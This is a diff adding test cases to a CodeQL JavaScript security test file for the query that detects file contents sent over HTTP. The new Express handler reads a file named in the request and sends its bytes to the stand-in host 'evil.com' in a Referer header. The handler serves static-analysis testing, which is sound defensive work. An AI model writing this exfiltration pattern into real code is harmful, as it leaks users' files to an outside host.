File tree Expand file tree Collapse file tree 1 file changed +33
-0
lines changed
javascript/ql/test/query-tests/Security/CWE-200 Expand file tree Collapse file tree 1 file changed +33
-0
lines changed Original file line number Diff line number Diff line change @@ -26,3 +26,36 @@ const fsp = require("fs").promises;
2626 console . error ( "Error reading file:" , error ) ;
2727 }
2828} ) ( ) ;
29+
30+ app . post ( '/readv' , async ( req , res ) => {
31+ const { filename } = req . body ;
32+ const fd = await fs . open ( filename , 'r' ) ;
33+
34+ const buffer = [ Buffer . alloc ( 1024 ) , Buffer . alloc ( 1024 ) ] ; // $ MISSING: Source[js/file-access-to-http]
35+ const { bytesRead } = fs . readvSync ( fd , buffer ) ;
36+ https . get ( {
37+ hostname : "evil.com" ,
38+ path : "/upload" ,
39+ method : "GET" ,
40+ headers : { Referer : buffer }
41+ } , ( ) => { } ) ; // $ MISSING: Alert[js/file-access-to-http]
42+
43+ const buffer1 = Buffer . alloc ( 1024 ) ; // $ MISSING: Source[js/file-access-to-http]
44+ const { bytesRead1 } = fs . readvSync ( fd , [ buffer1 ] ) ;
45+ https . get ( {
46+ hostname : "evil.com" ,
47+ path : "/upload" ,
48+ method : "GET" ,
49+ headers : { Referer : buffer1 . slice ( 0 , bytesRead1 ) . toString ( ) }
50+ } , ( ) => { } ) ; // $ MISSING: Alert[js/file-access-to-http]
51+
52+ const buffer2 = Buffer . alloc ( 1024 ) ; // $ MISSING: Source[js/file-access-to-http]
53+ fs . readv ( fd , [ buffer2 ] , ( err , bytesRead2 ) => {
54+ https . get ( {
55+ hostname : "evil.com" ,
56+ path : "/upload" ,
57+ method : "GET" ,
58+ headers : { Referer : buffer2 . slice ( 0 , bytesRead2 ) . toString ( ) }
59+ } , ( ) => { } ) ; // $ MISSING: Alert[js/file-access-to-http]
60+ } ) ;
61+ } ) ;
You can’t perform that action at this time.
0 commit comments